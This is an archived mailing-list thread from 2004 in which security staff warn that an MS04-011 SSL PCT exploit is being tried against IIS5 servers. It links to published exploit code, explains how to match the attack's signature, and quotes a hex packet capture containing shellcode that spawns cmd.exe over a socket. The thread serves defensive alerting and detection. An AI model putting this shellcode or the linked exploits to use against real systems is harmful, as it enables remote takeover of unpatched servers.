home
contact :: legal :: webstats
also in this section:

adminz

subject: (Fwd) Re: Heads up: Looks like MS04-011 exploit is being tried
posted: Wed, 28 Apr 2004 07:38:20 +0100


This is apparently a new crack against IIS5. Not that I run IIS.

Stuart

------- Forwarded message follows -------
Date sent: Tue, 27 Apr 2004 09:54:30 -0500 (CDT)
Subject: Re: Heads up: Looks like MS04-011 exploit is being tried
againstwww.domain
From: [email protected]
To: "James Riden o" <[email protected]>
Copies to: [email protected]

[ Double-click this line for list subscription options ]

This appears to be from the THC exploit for SSL PCT released last week.
http://packetstormsecurity.nl/filedesc/THCIISSLame.c.html
Running strings against the binary and grep'ing for "THCOWNZIIS!"
indicated the match.

Also be aware that what appears to be PERL-based exploit code is now
readily available, too, for this vulnerability.
http://www.k-otik.com/exploits/04242004.iis5x_ssl_pct.pm.php

Our experience testing the original THC code indicated that vulnerable
systems could be compromised in a matter of seconds.

>
> Seen as long ago as 25/04/2004. Haven't seen it used against any other
> servers here, so it's obviously targetted in some way. Example packet
> capture:
>
> 000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
> 010 : 00 EB 0F 54 48 43 4F 57 4E 5A 49 49 53 21 32 5E ...THCOWNZIIS!2^
> 020 : BE 98 EB 25 03 E7 3E D8 08 24 02 06 6C 59 6C 59 ...%..>..$..lYlY
> 030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
> 040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
> 050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,[email protected]
> 060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
> 070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
> 080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
> 090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
> 0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
> 0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
> 0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
> 0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
> 0e0 : 89 CE 31 DB 53 53 53 53 56 46 56 FF D0 89 C7 55 ..1.SSSSVFV....U
> 0f0 : 58 66 89 30 6A 10 55 57 FF 55 E0 8D 45 88 50 FF Xf.0j.UW.U..E.P.
> 100 : 55 E8 55 55 FF 55 EC 8D 44 05 0C 94 53 68 2E 65 U.UU.U..D...Sh.e
> 110 : 78 65 68 5C 63 6D 64 94 31 D2 8D 45 CC 94 57 57 xeh\cmd.1..E..WW
> 120 : 57 53 53 FE CA 01 F2 52 94 8D 45 78 50 8D 45 88 WSS....R..ExP.E.
> 130 : 50 B1 08 53 53 6A 10 FE CE 52 53 53 53 55 FF 55 P..SSj...RSSSU.U
> 140 : F0 6A FF FF 55 E4 .j..U.
>
> --
> James Riden / [email protected] / Systems Security Engineer
> GPG public key available at: http://www.massey.ac.nz/~jriden/
> This post does not necessarily represent the views of my employer.
>
>
> ---------------------------------------------------------------------------
> ----------------------------------------------------------------------------
>
>


---------------------------------------------------------------------------
----------------------------------------------------------------------------
------- End of forwarded message -------

---
* Origin: [adminz] tech, security, support (192.168.0.2)

generated by msg2page 0.06 on Jul 21, 2006 at 19:04:15

 search:
this site only
Like this site?
Your donation
is welcome!